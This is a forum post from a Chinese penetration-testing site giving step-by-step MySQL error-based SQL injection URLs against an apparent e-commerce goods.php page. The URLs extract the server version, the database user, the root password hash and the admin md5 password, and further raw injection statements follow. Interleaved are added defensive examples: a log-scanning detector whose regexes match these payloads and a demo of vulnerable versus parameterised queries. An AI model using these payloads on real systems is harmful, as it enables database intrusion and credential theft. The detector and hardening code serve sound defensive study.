中国网络渗透测试联盟

Title: Blind injection in detail

Author: admin    Time: 2012-9-5 14:59

Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The user_name column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The password column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Obtain the admin passwd (md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
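Every request above has the same skeleton: a duplicate-key error is forced with floor(rand()*2) under a GROUP BY, and the subselect spliced into concat() ends up in the error text. That repetition is what a defender can key on. The following detector is an added example and is not part of the original post; it parses access logs in the combined log format, URL-decodes each query-string value (bounded, so double encoding is also normalised) and scores it against the components of that skeleton. The log lines, the 203.0.113.x addresses and the paths are constructed for this demo.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log sample (combined log format). Hosts, IPs and paths are placeholders
# for this demo. Lines 2 and 4 carry query strings shaped like the error-based payloads
# discussed on the page; line 3 is a benign request that merely contains "group by".
SAMPLE_LOG = """\
203.0.113.7 - - [05/Sep/2012:14:59:01 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5120
203.0.113.7 - - [05/Sep/2012:14:59:05 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 612
203.0.113.9 - - [05/Sep/2012:15:01:10 +0800] "GET /search.php?q=group%20by%20artist HTTP/1.1" 200 2048
203.0.113.7 - - [05/Sep/2012:15:02:33 +0800] "GET /goods.php?id=-1%20union%20select%201,(select%201%20from(select%20count(*),concat((select%20user()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 598
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Each indicator is (name, regex over the normalised parameter value). "rand_floor" is the
# duplicate-key primitive itself (floor(rand()*2) feeding a GROUP BY); the rest are the
# pieces that usually travel with it: COUNT(*)+GROUP BY, schema tables, fingerprint
# functions, a UNION, and a trailing comment that truncates the rest of the real query.
INDICATORS = [
    ("rand_floor",     re.compile(r"floor\s*\(\s*rand\s*\(")),
    ("count_groupby",  re.compile(r"count\s*\(\s*\*\s*\).*group\s+by")),
    ("info_schema",    re.compile(r"information_schema\.")),
    ("mysql_user",     re.compile(r"mysql\.user")),
    ("fingerprint_fn", re.compile(r"@@version\w*|\buser\s*\(\s*\)|\bdatabase\s*\(\s*\)")),
    ("union_select",   re.compile(r"union\s+(all\s+)?select")),
    ("comment_tail",   re.compile(r"(#|--\s|/\*)\s*$")),
]


def decode_param(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded values normalise, then
    lowercase and collapse whitespace so the regexes see one canonical form."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value).lower()


def analyse_request(target: str) -> list:
    """Return the indicator names matched by any query-string value of a request target."""
    hits = []
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        norm = decode_param(value)
        for ind_name, rx in INDICATORS:
            if ind_name not in hits and rx.search(norm):
                hits.append(ind_name)
    return hits


def scan_log(text: str, threshold: int = 2) -> list:
    """Parse each log line and report requests whose parameters look like the
    error-based duplicate-key technique. A single weak indicator (a legitimate
    "group by" in a search box) is not enough; the rand/floor primitive alone is,
    because it has no benign reason to appear in a query string."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = analyse_request(m["target"])
        if "rand_floor" in hits or len(hits) >= threshold:
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "path": urlsplit(m["target"]).path,
                "status": int(m["status"]),
                "indicators": hits,
                # A 5xx on the flagged request suggests the DB error reached the
                # client, which is the channel this technique depends on.
                "error_surfaced": m["status"].startswith("5"),
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run it as-is and the two payload-shaped requests are reported with their matched indicators and an error_surfaced flag, while the benign "group by artist" search is not. The same analyse_request() can be wired into a WAF rule test or a SIEM enrichment step; the status-code correlation is the cheap way to tell a probe that failed from one where the application echoed the database error back.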

Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
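The statements in this section only work because the uid value is pasted into the SQL string and because the database's error message is shown to the client. The following is an added example, not code from the original post: it places that vulnerable shape beside a hardened version, using Python's sqlite3 so it runs offline. The table, its two rows and the payload string are constructed for the demo; the MySQL-only functions in the payload simply fail to resolve in sqlite, which is all that is needed to show the raw driver error reaching the caller on the vulnerable path and never reaching it on the hardened one.

```python
import sqlite3

# Constructed value in the shape of the page's "uid = -1 union select ..." statements.
# The application expects an integer here; everything after "-1" is attacker-supplied SQL.
PAYLOAD = ("-1 union select 1,(select 1 from(select count(*),concat(version(),"
           "floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)")


def build_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the page's table_name, with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE table_name (uid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO table_name VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, uid_param: str) -> dict:
    """String-built query: the parameter becomes part of the SQL grammar, and the raw
    driver error is handed back to the caller, which is exactly the channel that
    error-based injection reads its results from."""
    sql = f"SELECT * FROM table_name where uid = {uid_param}"
    try:
        return {"ok": True, "rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        return {"ok": False, "rows": [], "error": str(exc)}


def lookup_hardened(conn: sqlite3.Connection, uid_param: str) -> dict:
    """Three layers: a type check before the DB is touched, a bound parameter so the
    value can never alter the statement, and a generic error string so driver messages
    are never echoed to the client."""
    try:
        uid = int(uid_param)
    except ValueError:
        return {"ok": False, "rows": [], "error": "invalid uid"}
    try:
        rows = conn.execute("SELECT * FROM table_name WHERE uid = ?", (uid,)).fetchall()
    except sqlite3.Error:
        # Log the real exception server-side; the client only ever sees the generic text.
        return {"ok": False, "rows": [], "error": "internal error"}
    return {"ok": True, "rows": rows, "error": None}


def lookup_bound_only(conn: sqlite3.Connection, uid_param: str) -> list:
    """Binding without the type check: the whole payload is compared as a single literal
    against uid, so it matches nothing and cannot change the statement's structure."""
    return conn.execute("SELECT * FROM table_name WHERE uid = ?", (uid_param,)).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))
    print("hardened:  ", lookup_hardened(db, PAYLOAD))
    print("bound only:", lookup_bound_only(db, PAYLOAD))
    print("legit:     ", lookup_hardened(db, "2"))
```

The vulnerable path returns a non-empty driver error for the payload, the hardened path rejects it before any SQL runs, and the bound-only variant shows that parameter binding alone already removes the structural change; the type check and the generic error message close the two remaining channels (unexpected input reaching the database, and database text reaching the user).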




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2